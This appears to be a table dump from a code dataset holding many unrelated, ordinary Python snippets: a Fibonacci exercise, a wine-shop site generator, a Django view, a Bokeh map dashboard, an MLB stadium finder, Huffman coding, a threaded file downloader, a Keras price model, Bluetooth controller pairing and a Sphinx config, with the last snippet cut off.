text stringlengths 38 1.54M |
|---|
import time
start_time = time.time()
fibonacchi = [1, 2]
sum = 2
while fibonacchi[-1] < 4000000:
fibonacchi.append(fibonacchi[-1]+fibonacchi[-2])
if fibonacchi[-1] % 2 == 0 and fibonacchi[-1] < 4000000:
sum += fibonacchi[-1]
print(sum)
print("Elapsed Time: ",(time.time() - start_time)) |
from datetime import datetime
with open('SatrtLog.log', 'a', encoding='utf-8') as f:
f.seek(0)
data = datetime.now()
f.write(str(data)+'\n') |
import datetime
import argparse
from collections import defaultdict
from http.server import HTTPServer, SimpleHTTPRequestHandler
from jinja2 import Environment, FileSystemLoader, select_autoescape
from pandas import read_excel
def create_parser():
parser = argparse.ArgumentParser()
parser.add_argument(
'--path_to_file',
'-ptf',
default='',
help='''
Specify the full path to the
directory where your file is located
''')
parser.add_argument(
'--file_name',
'-f',
default='wine.xlsx',
help='''You can specify the name of the file with data.
The name is specified together with the file type (only .xlsx)'''
)
return parser
def main():
env = Environment(
loader=FileSystemLoader('.'),
autoescape=select_autoescape(['html', 'xml'])
)
template = env.get_template('template.html')
this_year = datetime.datetime.now().year
foundation_year = 1920
winery_age = this_year - foundation_year
parser = create_parser()
parser_namespace = parser.parse_args()
path_to_file = parser_namespace.path_to_file
file_name = parser_namespace.file_name
wines = read_excel(
f'{path_to_file}{file_name}',
na_values='nan',
keep_default_na=False)
wines = wines.sort_values('Категория')
wines = wines.to_dict(orient='record')
grouped_wines = defaultdict(list)
for wine in wines:
grouped_wines[wine['Категория']].append(wine)
rendered_page = template.render(grouped_wines=grouped_wines,
winery_age=winery_age)
with open('index.html', 'w', encoding="utf8") as file:
file.write(rendered_page)
server = HTTPServer(('0.0.0.0', 8000), SimpleHTTPRequestHandler)
server.serve_forever()
if __name__ == '__main__':
main()
|
import pandas as pd
import os
global_df = pd.read_csv('data/raw/reference.csv')
for country in [name for name in os.listdir('data/converted') if name.endswith('.csv')]:
print(f'fusing {country}')
country_df = pd.read_csv(f'data/converted/{country}')
global_df = global_df.drop(global_df.loc[global_df['Country/Region'] == country[:-4].capitalize()].index)
global_df = pd.concat([global_df, country_df], ignore_index=True)
global_df.to_csv('data/fused.csv', index=False)
|
from django.shortcuts import HttpResponse
from rest_framework import generics, status, viewsets
from rest_framework.decorators import api_view
from rest_framework.response import Response
from rest_framework.status import HTTP_200_OK
from rest_framework.views import APIView
from .serializers import TriggerSerializer
from background_runner.task import sleepy, start_tracking
def index(request):
sleepy.delay(30)
return HttpResponse("<h1>hi</h1>")
class Entry(object):
def __init__(self, **kwargs):
for field in ('start_url', 'start_page_number', 'category_id',):
setattr(self, field, kwargs.get(field, None))
class TriggerProcess(viewsets.ViewSet):
serializer_class = TriggerSerializer
def list(self, request):
start_url = str(request.data['start_url'])
start_page_number = str(request.data['start_page_number'])
category_id = str(request.data['category_id'])
print(start_url)
print(start_page_number)
print(category_id)
if start_url and start_page_number and category_id:
print("calling..")
start_tracking.delay(start_url, start_page_number, category_id)
# start_tracking(start_url, start_page_number)
entries = {
1: Entry(start_url=start_url, start_page_number=start_page_number, category_id=category_id),
}
serializer = TriggerSerializer(instance=entries.values(), many=True)
return Response({'success': True, 'message': 'tracking started successfully.'})
|
print("Enter how many row you went to print: ")
Row = int(input())
c = 1
while c<=Row:
print(c*"*")
c+=1
while Row>0:
print(Row*"*")
Row=Row-1 |
###############################################################
# pytest -v --capture=no tests/test_inventory.py::Test_inventory.test_001
# pytest -v --capture=no tests/test_inventory.py
# pytest -v tests/test_inventory.py
###############################################################
from pprint import pprint
from cloudmesh.common.Printer import Printer
from cloudmesh.common.util import HEADING
from cloudmesh.common.util import banner
from cloudmesh.inventory.inventory import Inventory
import pytest
@pytest.mark.incremental
class Test_inventory:
def setup(self):
self.i = Inventory()
banner("Info")
self.i.info()
def test_inventory(self):
HEADING()
for output in ['dict', 'yaml', 'csv', 'table']:
banner(output)
print(self.i.list(format=output))
banner("changing values")
self.i.add(host="i1", cluster="india", label="india")
self.i.add(host="i2", cluster="india", label="gregor")
self.i.add(host="d[1-4]", cluster="delta", label="delta")
banner("saving")
self.i.save()
for output in ['dict', 'yaml', 'csv', 'table']:
banner(output)
print(self.i.list(format=output))
banner("reading")
n = Inventory()
n.read()
t = n.list('table')
print(t)
assert "gregor" in str(t)
assert "+" in str(t)
"""
# We need nostest for this
cms inventory list
cms inventory help
cms help inventory
cms inventory list d[1-3]
cms inventory list
cms inventory add d[1-3] --project=openstack
"""
|
import os
import threading
import hazelcast
from bokeh.io import curdoc
from bokeh.layouts import column
from bokeh.models import ColumnDataSource
from bokeh.models.map_plots import GMapOptions
from bokeh.plotting import gmap
# set up Hazelcast connection
hz_config = hazelcast.ClientConfig()
hz_config.network_config.addresses.append('member-1:5701')
hz_config.network_config.addresses.append('member-2:5701')
# retry up to 10 times, waiting 5 seconds between connection attempts
hz_config.network_config.connection_timeout = 5
hz_config.network_config.connection_attempt_limit = 10
hz_config.network_config.connection_attempt_period = 5
hz = hazelcast.HazelcastClient(hz_config)
# position map and lock
position_map = hz.get_map('ping_input') # remote hz map
# if we eventually end up with multiple map servers this should be a distributed lock
position_change_map_lock = threading.Lock()
position_change_map = dict() # changes accumulate in this local map
# color map and lock
color_map = hz.get_map('ping_output') # remote hz map
# if we eventually end up with multiple map servers this should be a distributed lock
color_change_map_lock = threading.Lock()
color_change_map = dict() # changes accumulate in this local map
# alpha change map and lock, used to hide expired entries
alpha_change_map = dict()
alpha_change_map_lock = threading.Lock()
# add a listener to position map to place all add/update events into the changeMap
def position_listener(event):
global position_change_map
with position_change_map_lock:
position_change_map[event.key] = event.value
def deleted_listener(event):
global alpha_change_map
with alpha_change_map_lock:
alpha_change_map[event.key] = 0.0
position_map.add_entry_listener(include_value=True, added_func=position_listener, updated_func=position_listener,
expired_func=deleted_listener)
# add a listener to position map to place all add/update events into the changeMap
def color_listener(event):
global color_change_map
with color_change_map_lock:
color_change_map[event.key] = event.value
color_map.add_entry_listener(include_value=True, added_func=color_listener, updated_func=color_listener)
# now retrieve all entries from the map and build a ColumnDataSource
values = [entry.loads() for entry in
position_map.values().result()] # apparently map.values() returns a concurrent.futures.Future
key_to_index_map = {ping['id']: i for (i, ping) in enumerate(values)} # given a key, return its position in values
latitudes = [entry['latitude'] for entry in values]
longitudes = [entry['longitude'] for entry in values]
ids = [entry['id'] for entry in values]
colors = ['gray' for c in range(len(latitudes))]
alphas = [1.0 for a in range(len(latitudes))]
data_source = ColumnDataSource({'latitude': latitudes, 'longitude': longitudes, 'color': colors, 'alpha': alphas})
# build the map
map_options = GMapOptions(map_type='roadmap', lat=39.98, lng=116.32, zoom=10)
p = gmap(os.environ['GOOGLE_MAPS_API_KEY'], map_options, title='Bejing')
p.circle('longitude', 'latitude', color='color', size=7, fill_alpha='alpha', line_width=0, source=data_source)
layout = column(p)
def update():
patches = dict()
if len(position_change_map) > 0:
with position_change_map_lock:
entry_list = [entry for entry in [e.loads() for e in position_change_map.values()] if
entry['id'] in ids] # in check is costly, can we do something better ?
longitude_patches = [(key_to_index_map[entry["id"]], entry["longitude"]) for entry in entry_list]
latitude_patches = [(key_to_index_map[entry["id"]], entry["latitude"]) for entry in entry_list]
patches['longitude'] = longitude_patches
patches['latitude'] = latitude_patches
position_change_map.clear()
if len(color_change_map) > 0:
with color_change_map_lock:
color_patches = [(key_to_index_map[k], v) for k, v in color_change_map.items() if
k in ids] # in check is costly, can we do something better ?
color_change_map.clear()
patches['color'] = color_patches
if len(alpha_change_map) > 0:
with alpha_change_map_lock:
alpha_patches = [(key_to_index_map[k], v) for k, v in alpha_change_map.items() if k in ids]
alpha_change_map.clear()
patches['alpha'] = alpha_patches
if len(patches) > 0:
data_source.patch(patches)
curdoc().add_periodic_callback(update, 500)
curdoc().add_root(layout)
|
# Purpose of this python coding is to show closest mlb stadium(if google place api works okay)
# Get information like gametime, home_away_team, probable pitcher
# Also, get directions to there
import googlemaps
import geocoder
from datetime import timedelta
import dateutil.parser
import statsapi # please, install statsapi first ## pip install MLB-StatsAPI ##
from bs4 import BeautifulSoup
gmaps = googlemaps.Client(key='Your API KEY')
mylocation = geocoder.ip('me')
origin = mylocation.latlng # GPS, my location
# origin = {'lat': 34.1899, 'lng': -118.4514} #Van Nuys, CA
# origin = {'lat': 40.7128, 'lng': -74.0060} #New York
# origin = {'lat': 41.8781, 'lng': -87.6298} #Chicago
# origin = {'lat': 37.7749, 'lng': -122.4194} #San Francisco
# origin = {'lat': 47.6062, 'lng': -122.3321} #Seattle
# origin = {'lat': 47.5515, 'lng': -101.0020} #North Dakota, where no human is.... index error exception
places_result = gmaps.places_nearby(
location=origin, keyword='mlb', radius=50000, open_now=False, type='stadium')
# each team id gets game info and check home game and get game info
def game_info_detail(team_id):
game_id = statsapi.next_game(team_id)
home_game_check(game_id, team_id)
game_info(game_id)
def game_info(gameid):
statsapi.schedule(game_id=gameid)
get_wrong_game_time = dateutil.parser.parse(statsapi.schedule(
game_id=gameid)[0]['game_datetime']) # change datetime format
# statsapi's time is 7 hours later, so I used timedelta
adjust_game_time = get_wrong_game_time - timedelta(hours=7)
game_time = adjust_game_time.strftime('%H:%M:%S')
game_date = statsapi.schedule(game_id=gameid)[0]['game_date']
home_team = statsapi.schedule(game_id=gameid)[0]['home_name']
away_team = statsapi.schedule(game_id=gameid)[0]['away_name']
home_probable_pitcher = statsapi.schedule(
game_id=gameid)[0]['home_probable_pitcher']
away_probable_pitcher = statsapi.schedule(
game_id=gameid)[0]['away_probable_pitcher']
game_time_string = 'Next game will be at {} on {}'
home_team_string = 'Home team, Probable Pitcher: {} // {}'
away_team_string = 'Away team, Probable Pitcher: {} // {}'
print(game_time_string.format(game_time, game_date))
print(home_team_string.format(home_team, home_probable_pitcher))
print(away_team_string.format(away_team, away_probable_pitcher))
# home game check
def home_game_check(gameid, teamid):
if statsapi.schedule(game_id=gameid)[0]['away_name'] == statsapi.lookup_team(teamid)[0]['name']:
print('There is no home game!')
# check stadium name is matched with specific teams name and get its info
def get_game_info():
if places_result['results'][0]['name'] == 'Angel Stadium of Anaheim':
team_id = 108
game_info_detail(team_id)
if places_result['results'][0]['name'] == 'Dodger Stadium':
team_id = 119
game_info_detail(team_id)
if places_result['results'][0]['name'] == 'Yankee Stadium':
team_id = 147
game_info_detail(team_id)
if places_result['results'][0]['name'] == 'Citi Field':
team_id = 121
game_info_detail(team_id)
if places_result['results'][0]['name'] == 'Globe Life Park in Arlington':
team_id = 140
game_info_detail(team_id)
if places_result['results'][0]['name'] == 'Minute Maid Park':
team_id = 117
game_info_detail(team_id)
if places_result['results'][0]['name'] == 'Oakland-Alameda County Coliseum':
team_id = 133
game_info_detail(team_id)
if places_result['results'][0]['name'] == 'T-Mobile Park':
team_id = 136
game_info_detail(team_id)
if places_result['results'][0]['name'] == 'Tropicana Field':
team_id = 139
game_info_detail(team_id)
if places_result['results'][0]['name'] == 'Fenway Park':
team_id = 111
game_info_detail(team_id)
if places_result['results'][0]['name'] == 'Rogers Centre':
team_id = 141
game_info_detail(team_id)
if places_result['results'][0]['name'] == 'Oriole Park at Camden Yards':
team_id = 110
game_info_detail(team_id)
if places_result['results'][0]['name'] == 'Target Field':
team_id = 142
game_info_detail(team_id)
if places_result['results'][0]['name'] == 'Oracle Park':
team_id = 137
game_info_detail(team_id)
if places_result['results'][0]['name'] == 'Progressive Field':
team_id = 114
game_info_detail(team_id)
if places_result['results'][0]['name'] == 'Guaranteed Rate Field':
team_id = 145
game_info_detail(team_id)
if places_result['results'][0]['name'] == 'Wrigley Field':
team_id = 112
game_info_detail(team_id)
if places_result['results'][0]['name'] == 'Comerica Park':
team_id = 116
game_info_detail(team_id)
if places_result['results'][0]['name'] == 'Kauffman Stadium':
team_id = 118
game_info_detail(team_id)
if places_result['results'][0]['name'] == 'Miller Park':
team_id = 158
game_info_detail(team_id)
if places_result['results'][0]['name'] == 'Busch Stadium':
team_id = 138
game_info_detail(team_id)
if places_result['results'][0]['name'] == 'Great American Ball Park':
team_id = 113
game_info_detail(team_id)
if places_result['results'][0]['name'] == 'PNC Park':
team_id = 134
game_info_detail(team_id)
if places_result['results'][0]['name'] == 'Coors Field':
team_id = 115
game_info_detail(team_id)
if places_result['results'][0]['name'] == 'Chase Field':
team_id = 109
game_info_detail(team_id)
if places_result['results'][0]['name'] == 'Petco Park':
team_id = 135
game_info_detail(team_id)
if places_result['results'][0]['name'] == 'SunTrust Park':
team_id = 144
game_info_detail(team_id)
if places_result['results'][0]['name'] == 'Citizens Bank Park':
team_id = 143
game_info_detail(team_id)
if places_result['results'][0]['name'] == 'Nationals Park':
team_id = 120
game_info_detail(team_id)
if places_result['results'][0]['name'] == 'Marlins Park':
team_id = 146
game_info_detail(team_id)
try:
destination = places_result['results'][0]['geometry']['location']
directions_result = gmaps.directions(origin, destination)
# Check if there is only one stadium nearby
if places_result['results'][0] == places_result['results'][-1]:
print('Closest mlb stadium is: ', places_result['results'][0]['name'])
print("")
get_game_info()
print("")
print('distance is :',
directions_result[0]['legs'][0]['distance']['text'])
print('duration is :',
directions_result[0]['legs'][0]['duration']['text'])
print("")
for step in directions_result[0]['legs'][0]['steps']:
# used Beautifulsoup to get text only
soup = BeautifulSoup(step['html_instructions'], 'html.parser')
print(step['distance']['text'], ',', step['duration']
['text'], ',', soup.get_text())
else: # If there are two results(I believe maximum 2 results are allowed, as long as I get right information)
try: # find closest one.
destination_1 = places_result['results'][1]['geometry']['location']
directions_result_1 = gmaps.directions(origin, destination_1)
if int(directions_result[0]['legs'][0]['distance']['value']) < int(
directions_result_1[0]['legs'][0]['distance']['value']): # comparison by distance value
print("There are two mlb stadium near your location : ",
places_result['results'][0]['name'], ",", places_result['results'][1]['name'])
print('Closest mlb stadium is: ',
places_result['results'][0]['name'])
print("")
get_game_info()
print("")
print('distance is :',
directions_result[0]['legs'][0]['distance']['text'])
print('duration is :',
directions_result[0]['legs'][0]['duration']['text'])
print("")
for step in directions_result[0]['legs'][0]['steps']:
soup = BeautifulSoup(
step['html_instructions'], 'html.parser')
print(step['distance']['text'], ',',
step['duration']['text'], ',', soup.get_text())
elif int(directions_result[0]['legs'][0]['distance']['value']) > int(
directions_result_1[0]['legs'][0]['distance']['value']):
print("There are two mlb stadium near your location : ",
places_result['results'][0]['name'], ",", places_result['results'][1]['name'])
print('Closest mlb stadium is: ',
places_result['results'][1]['name'])
print("")
get_game_info()
print("")
print('distance is :',
directions_result_1[0]['legs'][0]['distance']['text'])
print('duration is :',
directions_result_1[0]['legs'][0]['duration']['text'])
print("")
for step in directions_result_1[0]['legs'][0]['steps']:
soup = BeautifulSoup(
step['html_instructions'], 'html.parser')
print(step['distance']['text'], ',',
step['duration']['text'], ',', soup.get_text())
except IndexError:
pass
except IndexError:
# index error unless there is result
print('There is no mlb stadium nearby!')
|
codes={}
def frequency (str):
freqs = {}
for ch in str:
freqs[ch] = freqs.get(ch,0) + 1
return freqs
def sortfreq (freqs):
letters = freqs.keys()
tuples = []
for let in letters :
tuples.append((freqs[let],let))
tuples.sort()
return tuples
def buildTree(tuples) :
while len(tuples) > 1 :
leastTwo = tuple(tuples[0:2])
theRest = tuples[2:]
combFreq = leastTwo[0][0] + leastTwo[1][0]
tuples = theRest + [(combFreq,leastTwo)]
tuples.sort()
return tuples[0]
def trimTree(tree):
p=tree[1]
if type(p)==type(''): return p
else: return (trimTree(p[0]),trimTree(p[1]))
def assignCodes (node, pat='') :
global codes
if type(node) == type("") :
codes[node] = pat
else:
assignCodes(node[0], pat+"0")
assignCodes(node[1], pat+"1")
return codes
def encode(str):
global codes
output=''
for ch in str:
output=output+codes[ch]
return output
def decode (tree,str):
output=''
p=tree
for bit in str:
if bit == '0': p=p[0]
else: p=p[1]
if type(p) == type(''):
output += p
p=tree
return output
str='aaabccdeeeeeffg'
freqs=frequency(str)
print '\nfrequency', freqs
sorts=sortfreq(freqs)
print '\nsorted frequency', sorts
tree=buildTree(sorts)
print '\nbuildtree', tree
trim=trimTree(tree)
print '\ntrimtree', trim
codes=assignCodes(trim)
print '\nassigncodes', codes
compression=encode(str)
print '\nencoding data', compression
extraction=decode(trim,compression)
print '\ndecoding data', extraction, '\n'
|
#!/usr/bin/evn python3
import sys
import os
import time
import urllib.request, urllib.parse, urllib.error
from threading import Thread
local_proxies = {'http': 'http://131.139.58.200:8080'}
class AxelPython(Thread, urllib.request.FancyURLopener):
def __init__(self, threadName, url, filename, ranges=0, proxies={}):
Thread.__init__(self, name=threadName)
urllib.request.FancyURLopener.__init__(self, proxies)
self.name = threadName
self.url = url
self.filename = filename
self.ranges = ranges
self.downloaded = 0
def run(self):
try:
self.downloaded = os.path.getsize(self.filename)
except OSError:
self.downloaded = 0
self.startPoint = self.ranges[0] + self.downloaded
if self.startPoint >= self.ranges[1]:
print('Part %s has been downloaded over.' % self.filename)
return
self.oneTimeSize = 16384 #16kByte/time
#print('task %s will download from %d to %d' % (self.name, self.startPoint, self.ranges[1]))
self.addheader("Range", "bytes=%d-%d" % (self.startPoint, self.ranges[1]))
self.addheader("Connection", "keep-alive")
self.urlHandler = self.open(self.url)
data = self.urlHandler.read(self.oneTimeSize)
while data:
fileHandler = open(self.filename, 'ab+')
fileHandler.write(data)
fileHandler.close()
self.downloaded += len(data)
data = self.urlHandler.read(self.oneTimeSize)
class Download:
def __init__(self):
self.complete = False
self.process = None
def getUrlFileSize(self, url, proxies={}):
urlHandler = urllib.request.urlopen(url)
return int(urlHandler.info()['Content-Length'])
def splitBlocks(self, totalSize, blockNumber):
blockSize = totalSize / blockNumber
ranges = []
for i in range(0, blockNumber - 1):
ranges.append((i * blockSize, i * blockSize + blockSize - 1))
ranges.append(( blockSize * (blockNumber - 1), totalSize - 1 ))
return ranges
def isLive(self, tasks):
for task in tasks:
if task.isAlive():
return True
return False
def downLoad(self, url, output, blocks=6, proxies=local_proxies):
size = self.getUrlFileSize(url, proxies)
ranges = self.splitBlocks(size, blocks)
threadName = ["thread_%d" % i for i in range(0, blocks)]
filename = ["tmpFile_%d" % i for i in range(0, blocks)]
tasks = []
for i in range(0, blocks):
task = AxelPython(threadName[i], url, filename[i], ranges[i])
task.setDaemon(True)
task.start()
tasks.append(task)
time.sleep(2)
while self.isLive(tasks):
downloaded = sum([task.downloaded for task in tasks])
process = downloaded / float(size) * 100
show = '\rfileSize:%d Downloaded:%d Completed:%.2f%%' % (size, downloaded, process)
self.process = process
sys.stdout.write(show)
sys.stdout.flush()
time.sleep(0.01)
self.complete = True
fileHandler = open(output, 'wb+')
for i in filename:
f = open(i, 'rb')
fileHandler.write(f.read())
f.close()
try:
os.remove(i)
pass
except:
pass
fileHandler.close()
if __name__ == '__main__':
url = "http://ftp.ticklers.org/releases.ubuntu.org/releases//precise/ubuntu-12.04.2-server-i386.iso"
output = 'ubuntu.iso'
d = Download()
d.downLoad(url, output, blocks=20, proxies={})
|
from type_check import ch_one
def test_ch_one():
assert ch_one(2) == int
assert ch_one(4 + 5.9) == float
assert ch_one(5.0) == float
assert ch_one(True and False) == bool
first_name = 'Anand'
last_name = 'S'
assert ch_one(f'{first_name} {last_name}') == str
|
#loading need libraries
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from scipy import stats
from sklearn.preprocessing import StandardScaler
def process_data(train):
categories = ['property_id', 'currency', 'property_type', 'place_name', 'state_name']
for cat in categories:
train[cat] = pd.Categorical(train[cat], categories=train[cat].unique()).codes
train['created_on_year'] = pd.DatetimeIndex(train['created_on']).year
train['created_on_month'] = pd.DatetimeIndex(train['created_on']).month
train['created_on_day'] = pd.DatetimeIndex(train['created_on']).day
#Correlation between train attributes
#Separate variable into new dataframe from original dataframe which has only numerical values
train_corr = train.select_dtypes(include=[np.number])
del train_corr['id']
del train_corr['geonames_id']
del train_corr['lat']
del train_corr['lon']
train = train_corr
train['floor'] = train['floor'].fillna(0) #high missing ratio
train['expenses'] = train['expenses'].fillna(train['expenses'].median())
#train['lon'] = train.groupby("state_name")["lon"].transform(
# lambda x: x.fillna(x.mean()))
#train['lon'] = train['lon'].fillna(train['lon'].mean())
#train['lat'] = train.groupby("state_name")["lat"].transform(
# lambda x: x.fillna(x.mean()))
#train['lat'] = train['lat'].fillna(train['lat'].mean())
train['rooms'] = train['rooms'].fillna(train['rooms'].mean())
train['surface_covered_in_m2'] = train['surface_covered_in_m2'].fillna(train['surface_covered_in_m2'].mean())
train['surface_total_in_m2'] = train['surface_total_in_m2'].fillna(train['surface_covered_in_m2'])
return train
def fit_transform_outliers(train):
cols = ['floor', 'expenses','surface_covered_in_m2', 'surface_total_in_m2']
qs = []
for col in cols:
q = train[col].quantile(0.999)
qs.append(q)
train.loc[train[col] > q, col] = q
print(qs)
return train,qs
def transform_outliers(train,qs):
cols = ['floor', 'expenses','surface_covered_in_m2', 'surface_total_in_m2']
for col, q in zip(cols, qs):
train.loc[train[col] > q, col] = q
print(qs)
return train
def scale_data(train):
scaler = StandardScaler()
train = scaler.fit_transform(train)
return pd.DataFrame(train), scaler
train = pd.read_csv('features-training.csv')
test = pd.read_csv('target-training.csv')
nlp = pd.read_csv('feature-nlp.csv')
values_from_title = pd.read_csv('feature_title.csv')
values_from_title['values'] = np.log1p(values_from_title['values'])
train = pd.concat([train, nlp['nlp'], values_from_title['values']], axis=1)
print(nlp.head())
test['price'] = np.log1p(test['price'])
train = process_data(train)
train, qs = fit_transform_outliers(train)
train, scaler = scale_data(train)
train = pd.concat([train,test['price']], axis=1)
print(train.head())
y = train['price']
del train['price']
X = train.values
y = y.values
from keras.layers import Input, Dense, BatchNormalization
from keras.models import Model, Sequential
from keras.layers import LeakyReLU
from keras.optimizers import Adam, RMSprop
from keras import backend as K
from keras.utils.vis_utils import plot_model
from keras.callbacks import LearningRateScheduler, TensorBoard, ModelCheckpoint
from sklearn.metrics import mean_squared_error
filename = 'house_prediction'
model = Sequential()
ACTIVATION = 'relu'
EPOCHS = 12
BATCH_SIZE = 1024
LEARNING_RATE= 0.01
LOSS_FUNCTION = 'mean_squared_error'
BETA_1 = 0.9
BETA_2 = 0.999
EPSILON = 1e-08
EPOCHS_DROP = 3
DROP = 0.1
model.add(Dense(512, input_dim=15, activation = ACTIVATION))
model.add(Dense(256, activation = ACTIVATION))
model.add(Dense(128, activation = ACTIVATION))
model.add(Dense(64, activation = ACTIVATION))
model.add(Dense(32, activation = ACTIVATION))
model.add(Dense(1))
def root_mean_squared_error(y_true, y_pred):
return K.sqrt(K.mean(K.square(y_pred - y_true)))
def step_decay(epoch):
initial_lrate = LEARNING_RATE
drop = DROP
epochs_drop = float(EPOCHS_DROP)
lrate = initial_lrate * np.power(drop,
np.floor((1+epoch)/epochs_drop))
if epoch % 10 == 0:
model.save(filename + "_graph_" + str(epoch))
return lrate
lrate = LearningRateScheduler(step_decay)
tbCallBack = TensorBoard(log_dir='./' + filename, histogram_freq=0, write_graph=True, write_images=True)
filepath="nlp_tabular_best"
checkpoint = ModelCheckpoint(filepath, monitor='val_loss', verbose=1, save_best_only=True, mode='max')
adam = Adam(lr=LEARNING_RATE, beta_1=BETA_1, beta_2=BETA_2, epsilon=EPSILON)
#rmsprop = RMSprop(lr=LEARNING_RATE)
model.compile (loss = root_mean_squared_error, optimizer = adam, metrics = ['mse', root_mean_squared_error])
model.fit (X, y, epochs = EPOCHS, batch_size = BATCH_SIZE, verbose = 1, callbacks=[lrate, tbCallBack, checkpoint], validation_split=0.1)
model.load_weights(filepath)
y_hat = model.predict(X)
print ("Total LMSE: " + str(mean_squared_error(y_hat, y)))
#y_hat = np.expm1(y_hat)
#np.savetxt('y_hat.csv', y_hat, delimiter=',', fmt=['%.10f'])
lb = pd.read_csv('features-test.csv')
nlp_test = pd.read_csv('nlp-test.csv')
values_from_title_test = pd.read_csv('title-test.csv')
values_from_title_test['values'] = np.log1p(values_from_title_test['values'])
lb = pd.concat([lb, nlp_test['nlp'], values_from_title_test['values']], axis=1)
id_lb = lb['id'].values.reshape((lb['id'].values.shape[0], 1)).astype(int)
lb = process_data(lb)
lb = transform_outliers(lb, qs)
lb = pd.DataFrame(scaler.transform(lb))
y_lb = np.expm1(model.predict(lb.values))
print (id_lb)
res = np.hstack([id_lb, y_lb])
np.savetxt('lb.csv', res, delimiter=',', fmt=['%d', '%.10f'])
|
#
# API Reference:
# https://git.kernel.org/pub/scm/bluetooth/bluez.git/tree/doc
#
from pydbus import SystemBus
from xml.etree import ElementTree as ET
import time, sys
_max_search_time = 40
def forget_all():
bus = SystemBus() # type: pydbus.bus.Bus
adapter = bus.get('org.bluez', '/org/bluez/hci0')
_forget_all_devices(bus, adapter)
def force_connect():
bus = SystemBus() # type: pydbus.bus.Bus
adapter = bus.get('org.bluez', '/org/bluez/hci0')
_connect_all_xbox_controllers(bus, adapter)
def pair_new():
bus = SystemBus() # type: pydbus.bus.Bus
adapter = bus.get('org.bluez', '/org/bluez/hci0')
controllers = _find_xbox_controllers(bus, adapter)
return _pair_xbox_controllers(bus, controllers)
def _find_xbox_controllers(bus, adapter):
print('looking for controllers')
start = time.time()
try:
adapter.StartDiscovery()
print('discovery began')
while time.time() - start < _max_search_time:
unpaired_devices = _list_xbox_controllers(bus, adapter, paired=False)
if len(unpaired_devices) > 0:
print('found {0} controllers'.format(len(unpaired_devices)))
return unpaired_devices
time.sleep(5)
finally:
print('discovery finished')
adapter.StopDiscovery()
return []
def _list_xbox_controllers(bus, adapter, paired=None, connected=None):
def matches(device):
if paired is not None:
if device['paired'] != paired: return False
if connected is not None:
if device['connected'] != connected: return False
return device['name'] == 'Xbox Wireless Controller'
return [device for device in _list_devices(bus, adapter) if matches(device)]
def _list_devices(bus, adapter):
data = ET.XML(adapter.Introspect())
dev_uuids = [node.attrib['name'] for node in data.findall('node')]
ret_val = []
for dev_id in dev_uuids:
device = bus.get('org.bluez', '/org/bluez/hci0/{0}'.format(dev_id))
ret_val.append({
'name' : device.Alias,
'address' : device.Address,
'dev' : dev_id,
'trusted' : device.Trusted,
'paired' : device.Paired,
'connected' : device.Connected
})
return ret_val
def _connect_all_xbox_controllers(bus, adapter):
unconnected_controllers = _list_xbox_controllers(bus, adapter, paired=True, connected=False)
for controller in unconnected_controllers:
device = bus.get('org.bluez', '/org/bluez/hci0/{0}'.format(controller['dev']))
device.Connect()
print('connected fine')
def _pair_xbox_controllers(bus, controllers):
pair_count = 0
for controller in controllers:
device = bus.get('org.bluez', '/org/bluez/hci0/{0}'.format(controller['dev']))
print('attempting to pair to {0}'.format(controller))
retry = 0
while retry < 2:
try:
device.Pair()
break
except:
print ('connect failed : {0}'.format(sys.exc_info()[0]))
time.sleep(2)
retry = retry + 1
if device.Paired:
print('pair successful')
device.Trusted = True
print('trusted now')
device.Connect()
print('connected fine')
pair_count = pair_count + 1
else:
adapter = bus.get('org.bluez', '/org/bluez/hci0')
adapter.RemoveDevice('/org/bluez/hci0/{0}'.format(controller['dev']))
return pair_count
def _forget_all_devices(bus, adapter):
controllers = _list_xbox_controllers(bus, adapter, paired=True)
for controller in controllers:
adapter.RemoveDevice('/org/bluez/hci0/{0}'.format(controller['dev']))
print('removed device {0}'.format(controller))
|
# Configuration file for the Sphinx documentation builder.
#
# This file only contains a selection of the most common options. For a full
# list see the documentation:
# https://www.sphinx-doc.org/en/master/usage/configuration.html
# -- Path setup --------------------------------------------------------------
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
import os
# import sys
# sys.path.insert(0, os.path.abspath('.'))
# -- Project information -----------------------------------------------------
project = 'UVVM'
author = 'UVVM'
copyright = '2021, UVVM'
# The full version, including alpha/beta/rc tags
def read_uvvm_version(fname):
with open(os.path.join(os.path.dirname(__file__), fname)) as rf:
lines = rf.readlines()
for idx, line in enumerate(lines):
if line.startswith('v'):
if '----' in lines[idx+1]:
return line.strip()
def read_module_version(fname):
versions = ''
with open(os.path.join(os.path.dirname(__file__), fname)) as rf:
lines = rf.readlines()
for idx, line in enumerate(lines):
if idx > 0:
versions += line.strip() + '\n'
return versions
uvvm_version = read_uvvm_version('../../CHANGES.TXT')
module_versions = read_module_version('../../versions.txt')
# -- General configuration ---------------------------------------------------
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
]
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This pattern also affects html_static_path and html_extra_path.
exclude_patterns = ['_build', 'Thumbs.db', '.DS_Store']
highlight_language = 'VHDL'
# -- Options for HTML output -------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
html_theme = 'sphinx_rtd_theme'
html_theme_options = {
'navigation_depth': '5',
'style_nav_header_background': '#F5F5F5',
'logo_only': 'True'
}
html_logo = 'images/uvvm.png'
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
# html_static_path = ['_static'] |
class Solution:
def maxProfit(self, prices: list) -> int:
if len(prices) <=1:
return 0
min_num = prices[0]
max_num = 0
for i in range(0, len(prices)):
max_num = max(max_num, prices[i]-min_num)
min_num = min(min_num, prices[i])
return max_num
if __name__ == '__main__':
sol = Solution()
output = sol.maxProfit([7,1,5,3,6,4])
print(output)
|
import os
SECRET_KEY = os.urandom(24)
DEBUG = True
SQLALCHEMY_DATABASE_URI = os.environ.get('DATABASE_URL')
SQLALCHEMY_TRACK_MODIFICATIONS = True
|
#!/usr/bin/env python3
# -*- coding: UTF-8 -*-
# [Grove - Chainable RGB LED X 2](http://wiki.seeedstudio.com/Grove-Chainable_RGB_LED/)
# on A2
import time
from Shell import InstallDTBO
import os
class P981X:
